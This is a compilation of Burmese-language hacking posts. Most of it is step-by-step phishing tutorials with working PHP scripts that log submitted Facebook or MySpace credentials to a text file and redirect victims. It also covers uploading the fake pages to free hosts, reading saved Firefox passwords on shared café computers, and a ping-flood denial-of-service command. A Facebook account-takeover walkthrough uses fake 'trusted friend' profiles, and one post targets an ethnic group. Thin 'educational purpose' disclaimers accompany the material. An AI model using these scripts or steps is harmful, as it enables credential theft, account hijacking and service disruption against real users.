Facebook Hacking...

အဆင့္(၁)
ပထမဆံုး notepad ကိုဖြင့္လိုက္ပါ...။
ၿပီးရင္ေအာက္မွာကၽြန္ေတာ္ေရးထားတဲ့ ေကာင္ေလးေတြကို ရိုက္ထည့္လိုက္ပါ..။
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
ရၿပီေနာ္ ရရင္ အဲဒီ ေကာင္ကို phishing.php ဆိုၿပီး Save ထားလိုက္ဗ်ာ...။
အဆင့္(၂)
ၿပီးေတာ့ကၽြန္ေတာ္တို႔ လိုသူငယ္ႏွပ္စား ေလးေတြလုပ္ေနက်အတိုင္း Facebook ရဲ႕ Log in page ကိုသြား
လိုက္ပါ..။ၿပီးရင္ Right Click ေထာက္..။View Page Source ကို သြား ..။ေပၚလာရင္ အားလံုးကို Select All
ေပးၿပီး notepad အသစ္တစ္ခု ထဲ မွာ ကူးထည့္ေပးပါ..။
အဆင့္(၃)
ၿပီးရင္ အဲဒီထဲမွာ Ctrl+F ႏွိပ္ၿပီး action=* ကိုရွာေပးပါ...။ေတြ႔ရင္..။ဒီလိုျဖစ္မယ္ထင္တယ္...။
ဒီလိုျဖစ္မယ္..
action=''https://login.facebook.com/login.php?''
အဲဒီေနရာမွာ..
action=''phishing.php''
လုိ႔ အစားထုိးေပးပါ...။
ရမလား ခင္ဗ်ာ...။
အဆင့္(၄)
ၿပီးရင္ အဲဒီေကာင္ကို facebooklogin.htm/ လုိ႔ေဆ့လိုက္ပါခင္ဗ်ာ..။
အဆင့္(၅)
ၿပီးရင္ notepad ကိုထပ္ဖြင့္ၿပီး Text File အလြတ္တစ္ခုကိုဖန္တီးလိုက္ပါ...။နာမည္က password.txt
ျဖစ္ပါ့မယ္..။
ေနာက္ဆံုးအဆင့္ကေတာ့ အဲဒီ ဖုိင္(၃) ဖိုင္ကို Upload လုပ္မယ့္အဆင့္ပါပဲ...။ ကၽြန္ေတာ္တို႔ အေနနဲ႕
အဲဒီ ဖိုင္သံုးဖိုင္ကို Free web hosting Site တစ္ခုခု မွာ တင္ရပါမယ္...။ဥပမာဘယ္လိုဆိုက္ေတြလဲ
ဆိုရင္
http://www.110mb.com/
http://www.ripway.com/
အဲဒီလို ဆိုက္ေတြပဲျဖစ္ပါတယ္..။ကၽြန္ေတာ္တို႔ နဖူးေတြ႕ဒူးေတြ႕ႀကံဳလိုက္ရတဲ့..Chrome.exe ဟာဆိုရင္
လည္း Ripway က hosting ယူထားတာျဖစ္ပါတယ္...။
ကၽြန္ေတာ္နမူနာ ျပမယ္ဆိုရင္ ..upload တင္ၿပီးတာနဲ႕ သူရဲ႕ URL က ဒီအတိုင္းျဖစ္ပါမယ္..။
http://sitename.110mb.com/facebooklogin.html ျဖစ္ပါ့မယ္..။
ဥပမာ ကၽြန္ေတာ္က heinlinhtun နာမည္နဲ႕ Register လုပ္ထားရင္..
http://heinlinhtun.110mb.com/facebooklogin.html ျဖစ္ပါလိမ့္မယ္...။
ဒါကိုမွ မေက်နပ္ေသးဘူးဆိုရင္ auto redirection URL ထုတ္ေပးတဲ့ ဆိုက္ေတြအမ်ားႀကီးရွိပါတယ္..။
သြားၿပီး ဆင္တူရိုးမွား ပံုစံအတုမ်ားလည္း ျပဳလုပ္လုိ႔ရပါေသးတယ္..။(လုပ္ခုိင္းတာ မဟုတ္ဘူးေနာ္)
အဲဒါၿပီးရင္ေတာ့ အဲဒီ လင့္ခ္ကိုယူ သူငယ္ခ်င္းဆီကိုပို႔ ဟိုဘက္က Log in ၀င္တာနဲ႕...ကြိၿပီပဲေနာ္..။
ကိုလင္းပို႕ေလး ရွယ္ေပးထားတာပါ ....

ဆိုင္ေတြမွာ Mozilla သံုးရင္ သတိထားမယ္

Mozillafirefox မွာ User Name နဲ႕ Password ေတြကို ပိုင္ရွင္မသိေအာင္ ၾကည့္လို႕ရပါတယ္....
လုပ္နည္းေလးကေတာ့ ....
1.Mozilla Firefox က Tool ထဲ၀င္ပါ ...
2.ၿပီးရင္ အဲထဲက Page Info ကို၀င္ပါ ....
3.Page Info ထဲေရာက္ၿပီဆိုရင္ အဲထဲက Security ကို၀င္ပါ....
4.View Saved Passwords ဆိုတာ ရွိတယ္ အဲထဲ၀င္ၿပီးရင္ ဖယားေလးတစ္ခု ပြင့္လာမယ္ Save Passwords ဆိုတာေလးပါ .... ဟဲ ... အဲမွာေမႊလို႕ရပါၿပီ ....
ဥပမာ- ဥပမာ အရင္လူက Facebook သံုးခဲ့တယ္ ဆိုပါေတာ့ Search မွာ www.facebook.com လို႕ရိုက္လိုက္ပါ .... URL ကေတာ့ မွန္ကန္ရပါမယ္ .... ဒါလည္းမခက္ပါဘူး မ်ားေသာအားျဖင့္ ဆိုင္ေတြမွာသံုးတဲ့အခါ ေမာ္ဇီလာအက္ဒရက္ဘားထဲမွာ စာလံုးတစ္လံုးစ ႏွစ္လံုးစ ရိုက္ၾကည့္ရံုနဲ႕တင္ ေရွ႕ကသံုးထားတာေတြ စီက်လာမွာပါ ...... အဲတာေတြကို ဆိုလိုတာပါ .... User Name ေတြကို ေတြ႕ရမွာပါ ... တစ္ခုခုေရြးၿပီး View Password ႏွိပ္လိုက္ပါ .... Warning တက္လာရင္ Yes သာေပးလိုက္ပါ .... ဒါဆို User Name ေဘးမွာ Password ေတြကို ေတြ႕ရၿပီေပါ့ ....

မွတ္ခ်က္.......(အက်င့္ယုတ္တဲ့ကုလားဆိုင္ေတြ သြားသံုးမိတဲ့ ေကာင္မေလးေတြ ပိုသတိထားသင့္တဲ့ ကိစၥပါ ဆိုင္ဆာဗာကေန User ရဲ႕ နည္းပညာအားနည္းမွုကို အခြင့္ေကာင္းယူသြားႏိုင္ပါတယ္ .... အလြယ္တကူ မိမိဓာတ္ပံုေတြကအစ လိုင္းေပၚတင္လုပ္ၾကံခံရတာကလည္း ဒီလိုနည္းေလးေတြလည္း အပါအ၀င္ေပါ့ .....သူတပါးကိုညစ္ပတ္ဖို႕မဟုတ္ပါဘူး ... သတိထားႏိုင္ေအာင္ တင္ေပးလိုက္တာပါ....)

Facebook သူငယ္ခ်င္းေတြရဲ႕ Gmail ေဖာ္ၾကည့္မယ္

ေဖ့ဘြတ္တြင္ သူငယ္ခ်င္းျဖစ္ထားေသာသူမ်ား၏ Email လိပ္စာေဖာ္ၾကည့္ဖို႕က မခဲယဥ္းပါဘူး ....
http://www.friendstogmail.com ကို ကလွစ္လိုက္ပါ ....
မ်ားေသာအားျဖင့္ facebook ရဲ႕ User Profile တိုင္းမွာ Email မေဖာ္ျပထားပါဘူး ၾကည့္ခ်င္ရင္ about ဆိုတဲ့လင့္ေလးကို ကလွစ္ၿပီး ၾကည့္ရတယ္ ဒါေတာင္ မေဖာ္ျပထားရင္ မေတြ႕ရပါဘူး ...မ်ားေသာအားျဖင့္ ေဖ့ဘြတ္အေၾကာင္းနည္းနည္းနားလည္လာတဲ့သူေတြက ေဖ်ာက္ထားတတ္ပါတယ္... မေတြ႕ရပါဘူး ....
ဒီနည္းကေတာ့ ေဖာ္ျပထားထား မထားထား ကိုယ့္သူငယ္ခ်င္းေတြရဲ႕ ေဖ့ဘြတ္၀င္တဲ့ အီးေမးကို သိႏိုင္ပါတယ္ ....
လုပ္ၾကည့္ဖို႕က မခဲယဥ္းပါဘူး Friend to Gmail and Google+ ေဘာက္စာမ်က္ႏွာတြင္ Load Friends ကလွစ္ပါ ကုဒ္အျဖစ္ေပၚလာပါက ကူးၿပီး Notepad နဲ႕ Save လုပ္ပါ ....
Save လုပ္သည့္ အခါ
1.File name တြင္ name.csv
2.Save as type တြင္ All Files
3.Encoding တြင္ ANSI
ေျပာင္းထည့္ၿပီး desktop ေပၚတြင္ Save ၾကည့္ပါက excel ဖိုင္ပံုစံေတြ႕ျမင္ရမွာပါ ...
open ၾကည့္ပါက Gmail,Address ေတြနဲ႕ User name ေတြကို သူငယ္ခ်င္းေတြနဲ႕ အဆက္အသြယ္ရွိထားသေလာက္ ေတြ႕ျမင္ရမွာပါ ......
ေဆာ့၀ဲသံုးရင္ IP မိရင္မိသြားႏိုင္တယ္ ဒီနည္းက စိတ္ခ်ရပါတယ္ ......
(အေၾကာင္းမဲ႕သူမ်ား အေကာင့္ဟက္ဖို႕ Gmail သိဖို႕တင္ေပးတာမဟုတ္ဘူးေနာ္ .....ဟိ ကိုယ့္ပါျပန္ေဖာ္ဟက္ေနမွာစိုးလုိ႕ ၾကိဳေျပာထားတာ .. အဲလိုဆို ခ်ာခ်မားဟက္ကာေတြနဲ႕တိုင္မွာေနာ္)

Wifi Share သံုးမယ္

ကဲေဘာ္ဒါတို႕ ဒါကေတာ့ Connectify ဆိုတဲ့
Laptop ကေနၿပီးေတာ႔ Wifi Share ေပးလိုသူမ်ားအတြက္ ဒီေဆာ့၀ဲလ္ ေလးကို Patch ဖိုင္နဲ႔အတူ ရွယ္လိုက္ပါတယ္။ Wifi Share ေပးတဲ႔ ေနရာမွာ မိမိတို႔ ႏွစ္သက္သလို Password ခံေပးႏုိင္ပါတယ္။ Internet Sharing အတြက္ဆိုရင္ Firewall ကို Off ေပးထားႏိုင္ရင္ပိုေကာင္းပါတယ္။ ေအာက္မွာLink ေပးထားတယ္ အသံုးလိုတဲ့သူ ယူသြားလိုက္ဗ်ာ။
ဒီမွာ ကလွစ္ ႏွိပ္ပါ

ေဖ့ဘြတ္ကြန္မန္းေပ့ ျပင္နည္း

ပထမဆံုး မိမိလုပ္ခ်င္တဲ့ ေဖ့ဘုတ္ဂရုစာမ်က္ႏွာတခုကို
Save page as >> Web page , complete နဲ ့ save
လိုက္ပါ .. ၿပီးရင္ save ထားတဲ့ web page ကို Notepad
နဲ ့ဖြင့္ၿပီး မိမိၿပင္လိုတဲ့ ပို ့စ္ကို ရွာၿပီး မိမိထည့္လိုတဲ့နစ္နိမ္း
မ်ား .. စာသားမ်ား ထည့္ၿပီးၿပင္လိုက္ပါ .. ၿပင္ၿပီးရင္ Note
pad ကို save ပါ ..
( မိမိထည့္သြင္းထားတဲ့ .. စာသားမ်ားက ရွည္ေနလို ့ enter
ေခါက္ခ်င္ရင္ enter ေခါက္ခ်င္တဲ့ေနရာမွာ <br> လို ့ရိုက္ထည့္
ပါ .. )

ၿပီးရင္ မိမိ save ထားတဲ့ web page ကို ကလစ္ႏွိပ္ၿပီးဖြင့္လိုက္
ပါ .. အဲ့ဒါဆို ကိုယ္ၿပင္ထားတဲ့ စာမ်က္ႏွာပြင့္လာပါလိမ့္မယ္ ..
အဲ့ဒီစာမ်က္ႏွာကို Screen Shot လုပ္လိုက္ပါ .. ၿပီးရင္အဲ့ဒီ
Screen Shot ကို ဖိုတိုေရွာ့ သို ့မဟုတ္ GIMP 2 နဲ ့ဖြင့္ၿပီး မိမိထည့္
လိုတဲ့ ဓါတ္ပံုမ်ားကိုထည့္ပါ ..

မိမိလုိခ်င္တဲ့ ဓါတ္ပံုမ်ားကို အၿခားသူေတြရဲ ့ပရိုဖိုင္ပံုေတြကို ေကာ္ပီ
ကူးၿပီးယူလို ့ရပါတယ္ .. ဒါ့အၿပင္ web page ကို save တုန္းကတခါ
တည္းပါလာတဲ့ ဖိုလ္ဒါ ထဲမွာလည္း ယူလို ့ရပါတယ္ ..

Webpage အတုဖန္တီးမယ္ ...

အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။
တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္

ရြယ္ခ်က္မရိွပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာျဖစ္ပါသည္။
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website
ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။

ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password
ေတြပါသြားၿပီေပါ့

ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting
တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log
fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္
websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ

Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္

header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php
ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို
notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက
user name နဲ႕ passwordေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့
E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..

PING OF DEATH

CMD ျဖင့္ DOSတိုတ္ခိုက္ျခင္း
by Myanmar Hacker Power Group on Thursday, September 6, 2012 at 8:29pm ·

- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္

 ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services
မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျ

ဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…

- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့

၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္

 ၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address

- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။

- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။
(Site-IP ေနရာတြင္တိုက္ခိုက္လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP addressကို ရိုက္ထည္႕ရပါမည္။

-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္
ကိုေျပာင္းလဲႏိုင္ပါတယ္

-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္
မွာလည္းကိုေျပာျခင္းပါတယ္

သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w
ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။

- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။

facebook ဟက္နည္းေလးပါ

 

  အခ်ိန္လည္း ေတာ္ေတာ္ယူရမယ္ဗ်...
ဒီနည္းေအာင္ျမင္ဖို႔က...ရတာေတာ႔ ရတယ္ဗ်ာ...hack လို႔ရတယ္...100% အာမခံတယ္....

တစ္ခုေတာင္းဆိုခ်င္တာကေတာ႔ မလိုအပ္ပဲနဲ႔ တျခားလူေတြကိုေတာ႔ လိုက္ အေႏွာင္႔အယွက္ မေပးေစခ်င္ပါဘူးဗ်ာ...လိုအပ္မွ လုပ္ေစလိုပါတယ္...educational purpose only ေပါ႔ဗ်ာ... :D

အဲ...ေလေၾကာရွည္တာလည္း ေတာ္ေတာ္မ်ားသြားျပီ...စလိုက္ၾကရေအာင္ဗ်ာ...ပထမဆံုး www.facebook.com ကိုသြားပါ...forgot password ကို ႏွိပ္ပါ...ဒီလိုမ်ိဳးေလးေတြ႔ရမယ္ဗ်ာ...



ကိုယ္ hack ရမယ္႔လူ သားေကာင္ရဲ႔ facebook profile email ကို သိဖို႔ေတာ႔လိုပါတယ္....မသိဘူးေတာ႔ မလုပ္ပါနဲ႔ဗ်ာ...ကိုယ္က သူ႔အေကာင္႔လိုခ်င္တာပဲ...ဒီေလာက္ေလးကေတာ႔ ကိုယ္႔နည္းကိုယ္႔ဟန္နဲ႔ စံုစမ္းသိရွိထားျပီးသားျဖစ္ရမွာပါ...ကိုယ္နဲ႔ friend ျဖစ္ေနရင္ သူ႔ info ထဲ၀င္ၾကည္႔လိုက္ရင္ သိႏိူင္တာပဲဗ်ာ...
Enter your email or phone no. ေနရာမွာ သူ႔ email address ကိုထည္႔ပါ...Search ကို ႏွိပ္ပါ...result ထြက္လာရင္ This is my account ကို ႏွိပ္ပါ....



ဒီေအာက္က ပံုမွျပထားတဲ႔အတိုင္း အဲ page ကို redirect ေရာက္သြားပါလိမ္႔မယ္...No longer have access to these ကိုႏွိပ္ပါ...



ေအာက္မွာျပထားတဲ႔ ပံုအတိုင္း new email , confirm new email ေတာင္းေနပါျပီ...ျဖည္႔ေပးလိုက္ပါ....



ကိုယ္႔ victim account ဟာ security question တပ္ထားရင္ security question ေျဖခိုင္းပါလိမ္႔မယ္...ျဖစ္ႏိူင္တာ ခန္႔မွန္းေျဖၾကည္႔ပါ...ခန္႔မွန္းလို႔မရဘူး ဆိုရင္ေတာ႔ wrong answer ကိုသာ ဘာျဖစ္ျဖစ္ရိုက္ထည္႔ေပးလိုက္ပါ...

ေတာ္ေတာ္မ်ားမ်ား ဒီ step မွာ ရပ္ကုန္ၾကတာမ်ားတယ္ဗ်...Security Question ေမးလိုက္တာနဲ႔ ဘာလုပ္လို႔ ဘာကိုင္ရမွန္းမသိေတာ႔ဘူး....Underground Forum ေတာ္ေတာ္မ်ားမ်ားမွာလည္း ဒီ step ကို မေတြ႔ဖူးဘူးဗ်...လြယ္ပါတယ္...

၃ ခါ ရိုက္ထည္႔စမ္းေပးရပါမယ္...၃ခါ ရိုက္ထည္႔လိုက္တာနဲ႔ Security Question ထပ္မေျဖခိုင္းေတာ႔ဘဲ ဒီေအာက္ကပံု အဆင္႔(Trusted Friend သံုးေယာက္)ေရြးခိုင္းတဲ႔အဆင္႔ကိုေရာက္သြားပါလိမ္႔မယ္...



အဲ...ဒီတစ္ဆင္႔မွာလည္း trusted friend ေနာ္...ရိုးရိုး friend မဟုတ္ဘူး...friend ျဖစ္ရံုပဲ ျဖစ္တာဆိုရင္ သူေရြးခိုင္းတဲ႔အထဲမွာ မပါပါဘူး...comment ေတြ status ေတြ အသြားအျပန္ေလးလည္း ရွိရေသးတယ္ဗ်...အဲဒါေၾကာင္႔မို႔ facebook မွာ ကိုယ္နဲ႔လည္း မသိပဲနဲ႔ ေရာေသာေဖာေသာ လာလုပ္ေနျပီဆိုရင္ သတိသာထားေပေတာ႔....ဒီေကာင္ ဘာေကာင္လဲ လို႔.... :D

အဲဒီမွာ ယံုၾကည္ရမယ္႔ ကိုယ္ ခ်ဳပ္ကိုင္ႏိူင္မယ္႔ အေကာင္႔သံုးခုကို ေရြးထည္႔ေပးလိုက္ရံုပါပဲ...fake facebook profile ေလးေတြလုပ္ထားေပါ႔ဗ်ာ...လိုရင္ သံုးလို႔ရေအာင္..... :D facebook က အဲသူငယ္ခ်င္းသံုးေယာက္ဆီကို code ေလးေတြပို႔ပါလိမ္႔မယ္...အဲ code ေတြကို ဒီဖက္မွာ ျပန္လာျဖည္႔လိုက္ရင္ facebook က ကိုယ္႔ email ဆီကို password reset mail ပို႔ပါလိမ္႔မယ္...ဒီလိုဆို new password ကို ေျပာင္းျပီးေတာ႔ သူ႔ facebook account ထဲကို login ၀င္ႏိူင္ပါျပီ....

ဘေလာကာ ကိုေက်ာ္ကိုကို၏ http://www.kokyawkoko.com  ဆိုဒ္မွ ကူးယူေဖာ္ျပေပးထားျခင္းျဖစ္ပါသည္ .... ခြင့္မေတာင္းခံဘဲ ကူးယူလာတာ ခြင့္လြတ္ေနာ္ ကိုၾကီးေက်ာ္

Gmail Phishing

Fake Facebook Login

က်ေနာ္ အစကေတာ့ က်ေနာ့္ သူငယ္ခ်င္းေတြအတြက္ Gmail Phishing ေလး တင္ေပးမလို႕ပါဘဲ။ဒါေပမယ့္ တခ်ိဳ႕ေတြက နည္းပညာကိုအသံုးခ်ျပီး ကိုယ္ေလာက္မသိေသးတဲ့သူေတြရဲ့ အေကာင့္ေတြကို အရယူ ၊ ထိုအေကာင့္ထဲက အခ်က္အလက္ေတြကို ဝင္ဖတ္ ဝင္ၾကည့္ တက္ပါတယ္။Gmail , Gtalk ဆိုတာကလည္း ျမန္မာလူငယ္ေတြအသံုးမ်ားတဲ့အတြက္ နည္းပညာမၾကြယ္၀ေသးတဲ့ ျမန္မာလူငယ္ေတြအတြက္ အႏၱရာယ္ရွိေနပါတယ္။အဲ့ဒါေၾကာင့္ က်ေနာ္ Facebook Phishing ေလး ကိုဘဲ တင္ေပးလိုက္ပါတယ္။အဲ့ဒါဆိုရင္ က်ေနာ္တို႕ ကုလားေတြရဲ့ Facebook account ေတြကို ဒီ Phishing ေလး နဲ႕ Hacking လုပ္ႏိုင္ပါျပီ။
တစ္ခု ... က်ေနာ္ က ပညာရွင္မဟုတ္ပါဘူး။ေလ့လာဆဲ ဘာမွမသိေသးတဲ့ေကာင္ပါ။အခုတင္ေပးတာကလည္း ကုလားေတြကို DDOS ေကၽြးရတာ အားမရဘူး။ကိုယ္တိုင္ Hacking လုပ္ခ်င္တဲ့ သူငယ္ခ်ငး္ေတြအတြက္ပါ။အႏူးညႊန္ေတာင္းပန္ခ်င္တာကေတာ့ ျမန္မာအခ်င္းခ်င္း ျပန္မဟတ္ဖို႕အႏူးညႊန္႕ေမတၱာရပ္ခံပါတယ္ခဗ်ာ။
ကဲ .. စလုပ္ၾကည့္ရေအာင္ ...

( ၁ )
၁ ။ www.facebook.com ကိုသြားပါ။
၂ ။ Right Click ႏွိပ္ျပီး View page source ကိုဝင္ပါ။
၃ ။ View page source ထဲမွာရွိတဲ့စာေတြအကုန္လံုးကို Copy ကူးပါ။ ( Ctrl + A , Ctrl + C )
၄ ။ Run Box ကိုေခၚျပီး Notepad ကိုဖြင့္ပါ။( Window key နဲ႕ R Key ကို တြဲႏွိပ္ျပီး Run Box မွာ Notepad လို႕ရိုက္ဖြင့္ပါ)
၅ ။ View page source မွာ Copy ကူးခဲ့တဲ့စာေတြကို Notepad ထဲမွာ Paste လုပ္လုိက္ပါ။ ( Crtl + V )
၆ ။ Action ကိုရွာပါ။ ( Ctrl + F ကိုႏွိပ္ျပီး Box ေလးထဲမွာ action ကို ရိုက္ထည့္ျပီး ရွာပါ )
၇ ။ Action အေနာက္မွာရွိတဲ့ စာေတြကို ဖ်က္ပါ။ ( History"],["LoginFormController","init",["m049703_2","m049703_3"], [{"__m":"m049703_2"},{"__m":"m049703_3"}]],["TinyViewport"],["WebStorageMonster )
၈ ။ ျပီးရင္ index.html နဲ႕ Save ပါ။Save as type မွာ All file ကို ေရြးေပးရပါမည္။

( ၂ )
၁ ။ Run Box ေခၚျပီး Notepad အသစ္တစ္ခု ထပ္ဖြင့္ပါ။
၂ ။ က်ေနာ္ ေအာက္တြင္ေပးထားေသာ စာမ်ားကို Copy ကူ;ယူျပီး ေစာေစာက သင္ဖြင့္ထားေသာ Notepad ထဲတြင္ Paste လုပ္ပါ။

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

၃ ။ hack.php ျဖင့္ Save လုပ္ပါ။ Save as type မွာ All file ကိုဘဲ ေရႊးေပးပါ။

( ၃ )
၁ ။ ေနာက္ထပ္ Notepad အသစ္တစ္ခုဖြင့္ျပီး ဘာမွမပါဘဲ pswrd ျဖင့္ Save ပါ။ Save as type မွာ txt ပါ။

အဲ့ဒီအဆင့္ သံုး ဆင့္ ျပီးသြားျပီဆိုရင္ သင့္ကြန္ပ်ဴတာ Desktop ေပၚတြင့္ ဖိုင္ ၃ ခု ရရွိလာပါလိမ့္မယ္။
အဲ့လိုရလာျပီဆိုရင္ က်ေနာ္တို႕ ဒီအပိုင္းကို ခဏ ရပ္ထားလိုက္ရေအာင္ ။ ေနာက္ထပ္အပိုင္းတစ္ခုျဖစ္တဲ့ Domain ရယူျခင္း ကို သြားၾကရေအာင္။
၁ ။ www.google.com မွာ free php hosting web sites လို႕ ရိုက္ျပီး သင္ႏွစ္သက္ရာ ဆိုဒ္တစ္ခုမွာ Sign up လုပ္ပါ။
က်ေနာ္ က ေတာ့ www.000webhost.com ကို ေရြးပါတယ္။
၂ ။ Sign up လုပ္ျပီးလွ်င္ သင့္အီးေမးလ္ထဲသို႕ ေမးလ္တစ္ေစာင္ဝင္လာပါလိမ့္မယ္။နည္းနည္းၾကာတယ္။ေစာင့္ပါ။ေမးလ္ေရာက္လာျပီဆိုရင္ သူေပးထားေသာလင့္ကို ေကာ္ပီ ကူး address bar မွာ paste လုပ္ျပီး သြားလိုက္ပါ။အဲ့ဒါဆိုရင္ သင့္အေကာင့္ Confirn ျဖစ္သြားပါျပီ။
အဲ့လို ရရွိလာျပီဆိုရင္ ဒါေလးက ေနာက္ဆံုးအဆင့္ျဖစ္ပါတယ္။ သင္ဖြင့္ထားေသာဆိုဒ္မွာ sign in ဝင္ျပီး Go to Cpanel ထဲကိုဝင္ပါ။
ထိုေနာက္ File manager ထဲကိုဝင္ပါ။ Public_html ဆိုတဲ့ဖိုင္ထဲမွာ php ဆိုတဲ့ဖိုင္ကို ဖ်က္ျပီး ေစာေစာက သင္ျပဳလုပ္ထားေသာ ဖိုင္ သံုးခု ကို Upload တင္ပါ။

အဲ့ဒါဆိုရင္ Phishing ျပဳလုပ္ျခင္း ျပီးဆံုးသြားပါျပီ။သင္ Hack လိုေသာ user အား သင့္ျပဳလုပ္ထားေသာ Fake facebook login page ရဲ့ url ကို ေပးပို႕လိုက္ပါ။သူက Sign in လုပ္လိုက္တယ္ဆိုရင္ေတာ့ သင္ေစာေစာက ဘာစာမွမေရးဘဲ save လုပ္ထားတဲ့ pswrd.txt ဆိုတဲ့ဖိုင္ထဲကို User name နဲ႕ Password ေရာက္ရွိလာပါလိမ့္မယ္။
